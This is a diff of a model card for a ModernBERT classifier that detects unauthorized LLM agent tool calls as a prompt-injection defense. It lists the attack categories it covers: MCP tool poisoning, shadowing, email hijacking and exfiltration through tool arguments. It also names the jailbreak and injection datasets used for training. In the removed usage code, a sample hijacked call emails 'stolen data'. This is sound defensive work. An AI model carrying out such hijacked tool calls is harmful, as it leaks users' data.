llm-semantic-router/toolcall-verifier

@@ -20,7 +20,7 @@ datasets:
 base_model: answerdotai/ModernBERT-base
 pipeline_tag: token-classification
 model-index:
-- name: tool-call-verifier
   results:
   - task:
       type: token-classification
@@ -46,7 +46,6 @@ model-index:
 [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
 [![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
-[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)
 **Stage 2 of Two-Stage LLM Agent Defense Pipeline**
@@ -65,54 +64,6 @@ ToolCallVerifier is a **ModernBERT-based token classifier** that detects unautho
 ---
-## 📊 Performance
-| Metric | Value |
-|--------|-------|
-| **UNAUTHORIZED F1** | **93.50%** |
-| UNAUTHORIZED Precision | 95.01% |
-| UNAUTHORIZED Recall | 92.05% |
-| Overall Accuracy | 92.88% |
-### Confusion Matrix (Token-Level)
-```
-                    Predicted
-                 AUTH      UNAUTH
-Actual AUTH      130,708    8,483
-       UNAUTH     13,924   161,031
-```
----
-## 🗂️ Training Data
-Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
-### HuggingFace Datasets
-| Dataset | Description | Samples |
-|---------|-------------|---------|
-| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
-| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
-| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
-| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
-### Synthetic Attack Generators
-| Generator | Description |
-|-----------|-------------|
-| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
-| Filesystem | File/directory operation attacks |
-| Network | Network/API exfiltration attacks |
-| Email | Email tool hijacking |
-| Financial | Transaction manipulation |
-| Code Execution | Code injection attacks |
-| Authentication | Access control bypass |
-| MCP Attacks | Tool poisoning, shadowing, rug pulls |
----
 ## 🚨 Attack Categories Covered
 | Category | Source | Description |
@@ -127,60 +78,6 @@ Trained on **~30,000 samples** combining real-world attacks and synthetic patter
 | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
 | MCP Shadowing | Synthetic | Fake authorization context |
----
-## 💻 Usage
-```python
-from transformers import AutoTokenizer, AutoModelForTokenClassification
-import torch
-model_name = "rootfs/tool-call-verifier"
-tokenizer = AutoTokenizer.from_pretrained(model_name)
-model = AutoModelForTokenClassification.from_pretrained(model_name)
-# Example: Verify a tool call
-user_intent = "Summarize my emails"
-tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
-# Combine for classification
-input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
-inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
-with torch.no_grad():
-    outputs = model(**inputs)
-    predictions = torch.argmax(outputs.logits, dim=-1)
-id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
-tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
-labels = [id2label[p.item()] for p in predictions[0]]
-# Check for unauthorized tokens
-unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
-if unauthorized_tokens:
-    print("⚠️ BLOCKED: Unauthorized tool call detected!")
-    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
-else:
-    print("✅ Tool call authorized")
-```
----
-## ⚙️ Training Configuration
-| Parameter | Value |
-|-----------|-------|
-| Base Model | `answerdotai/ModernBERT-base` |
-| Max Length | 512 tokens |
-| Batch Size | 32 |
-| Epochs | 5 |
-| Learning Rate | 3e-5 |
-| Loss | CrossEntropyLoss (class-weighted) |
-| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
-| Attention | SDPA (Flash Attention) |
-| Hardware | AMD Instinct MI300X (ROCm) |
----
 ## 🔗 Integration with FunctionCallSentinel
@@ -188,7 +85,7 @@ This model is **Stage 2** of a two-stage defense pipeline:
 ```
 ┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
-│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
 │                 │     │      (Stage 1)       │     │                 │
 └─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                               │
@@ -220,23 +117,8 @@ This model is **Stage 2** of a two-stage defense pipeline:
 - Non-tool-calling scenarios
 - Languages other than English
----
-## ⚠️ Limitations
-1. **Tool schema dependent** — Best performance when tool schema is included in input
-2. **English only** — Not tested on other languages
-3. **Binary classification** — No "suspicious" intermediate category (by design, for decisiveness)
----
 ## 📜 License
 Apache 2.0
----
-## 🔗 Links
-- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)

 base_model: answerdotai/ModernBERT-base
 pipeline_tag: token-classification
 model-index:
+- name: toolcall-verifier
   results:
   - task:
       type: token-classification
 [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
 [![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
 **Stage 2 of Two-Stage LLM Agent Defense Pipeline**
 ---
 ## 🚨 Attack Categories Covered
 | Category | Source | Description |
 | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
 | MCP Shadowing | Synthetic | Fake authorization context |
 ## 🔗 Integration with FunctionCallSentinel
 ```
 ┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
+│   User Prompt   │────▶│   ToolCallSentinel   │────▶│   LLM + Tools   │
 │                 │     │      (Stage 1)       │     │                 │
 └─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                               │
 - Non-tool-calling scenarios
 - Languages other than English
 ## 📜 License
 Apache 2.0
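
The Performance section removed by this diff reports UNAUTHORIZED precision, recall, and F1 alongside a token-level confusion matrix. As a sanity check, the metrics can be recomputed from the four matrix counts. The sketch below is illustrative only: the helper name `binary_metrics` is hypothetical, and it assumes UNAUTHORIZED is the positive class and that rows of the matrix are actual labels and columns are predicted labels, as the removed table's layout suggests.

```python
# Token-level confusion matrix counts copied from the removed Performance section.
# Assumption: rows are actual labels, columns are predicted labels,
# and UNAUTHORIZED is treated as the positive class.
tn = 130_708  # actual AUTH,   predicted AUTH
fp = 8_483    # actual AUTH,   predicted UNAUTH
fn = 13_924   # actual UNAUTH, predicted AUTH
tp = 161_031  # actual UNAUTH, predicted UNAUTH


def binary_metrics(tp: int, fp: int, fn: int, tn: int) -> dict[str, float]:
    """Hypothetical helper: standard binary metrics from confusion counts."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    accuracy = (tp + tn) / (tp + fp + fn + tn)
    return {
        "precision": precision,
        "recall": recall,
        "f1": f1,
        "accuracy": accuracy,
    }


metrics = binary_metrics(tp, fp, fn, tn)
for name, value in metrics.items():
    print(f"{name}: {value:.2%}")
```

Under these assumptions the recomputed values agree with the removed table to within roughly 0.02 percentage points; the small remaining gaps are presumably rounding in the reported figures.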